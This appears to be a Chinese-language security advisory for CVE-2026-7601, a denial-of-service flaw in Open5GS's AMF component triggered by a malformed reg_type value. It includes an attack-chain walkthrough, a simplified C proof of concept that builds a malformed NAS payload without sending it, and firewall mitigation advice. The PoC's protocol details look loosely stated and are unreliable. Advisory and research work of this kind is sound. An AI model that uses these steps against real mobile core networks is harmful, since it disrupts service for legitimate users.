CVE-2026-7601 Open5GS AMF组件拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-7601

漏洞类型

拒绝服务

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

Open5GS是一款开源的5G核心网实现。在2.7.6及之前的版本中，AMF组件的gmm-handler.c文件存在漏洞。攻击者可以通过网络远程操纵reg_type参数，触发拒绝服务。该漏洞利用难度低，无需用户交互，成功利用可导致服务中断。官方已发布2.7.7版本修复此问题，建议立即升级。

技术细节

该漏洞位于Open5GS的接入和移动性管理功能（AMF）组件中，具体涉及src/amf/gmm-handler.c文件的未知函数处理逻辑。漏洞的根本原因在于程序对输入参数`reg_type`缺乏严格的校验机制。在正常的5G NAS信令交互中，`reg_type`用于指示注册类型。攻击者可以通过构造特制的NAS消息，将`reg_type`字段设置为恶意值。当AMF组件解析该消息时，由于未对参数范围或有效性进行检查，可能导致空指针解引用、数组越界或逻辑错误，进而引发服务进程崩溃。由于CVSS向量为AV:N/AC:L/PR:L，攻击者只需具备低权限账号即可通过网络发起攻击，且无需用户交互。尽管该漏洞不影响机密性和完整性，但会对服务可用性造成严重影响，导致核心网服务中断。

攻击链分析

STEP 1

1. 侦察

攻击者扫描网络，识别暴露的Open5GS AMF组件服务端口（通常为SCTP端口）。

STEP 2

2. 制作载荷

分析Open5GS源码，构造包含恶意`reg_type`参数的NAS注册请求数据包。

STEP 3

3. 发起攻击

攻击者与目标AMF建立SCTP连接，并发送特制的恶意数据包。

STEP 4

4. 触发漏洞

AMF组件在gmm-handler.c中处理该请求时，因`reg_type`校验缺失导致逻辑错误。

STEP 5

5. 拒绝服务

AMF进程崩溃或挂起，导致合法用户无法接入移动网络，达成DoS攻击目的。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * Conceptual PoC for CVE-2026-7601
 * Demonstrates how to craft a malformed NAS Registration Request
 * targeting the Open5GS AMF 'reg_type' parameter.
 * Note: This requires a valid SCTP association with the AMF in a real scenario.
 */

#include <stdio.h>
#include <string.h>
#include <stdint.h>

// Simplified NAS PDU structure for demonstration
void craft_malformed_nas(uint8_t *buffer, size_t *len) {
    // NAS Security Header (Plain)
    buffer[0] = 0x7e; // Registration Request message type
    buffer[1] = 0x00; 
    
    // Manipulating the 'reg_type' argument (usually at offset 2 or specific protocol location)
    // Setting an unexpected value to trigger the parsing logic error
    buffer[2] = 0xFF; // Malicious reg_type value
    
    // Fill with dummy data to simulate packet length
    memset(buffer + 3, 0x41, 20);
    *len = 23;
}

int main() {
    uint8_t payload[1024];
    size_t payload_len;

    printf("[*] Crafting PoC payload for CVE-2026-7601...\n");
    craft_malformed_nas(payload, &payload_len);

    printf("[*] Payload generated (Length: %zu bytes)\n", payload_len);
    printf("[*] Malicious reg_type value: 0x%02X\n", payload[2]);
    
    // In a real exploit, this payload would be sent over SCTP to the AMF port (e.g., 38412)
    // sendto(sctp_socket, payload, payload_len, 0, (struct sockaddr *)&amf_addr, addr_len);
    
    printf("[!] If sent to a vulnerable Open5GS AMF (< 2.7.7), this should cause a crash (DoS).\n");
    return 0;
}

影响范围

Open5GS <= 2.7.6

防御指南

临时缓解措施

在未完成升级前，建议在网络边界部署防火墙，限制对AMF管理端口的访问来源，仅允许信任的基站（gNB/eNodeB）IP地址连接，并监控AMF日志中异常的注册请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7601
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7601
3 Details https://www.cvedetails.com/cve/CVE-2026-7601/
4 VulDB https://vuldb.com/cve/CVE-2026-7601
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/commit/ebc66942b6f8f1fab2d640e71cf4e9f1a423b426
7 Link https://github.com/open5gs/open5gs/issues/4321
8 Link https://github.com/open5gs/open5gs/releases/tag/v2.7.7
9 Link https://vuldb.com/submit/805675
10 Link https://vuldb.com/vuln/360558
11 Link https://vuldb.com/vuln/360558/cti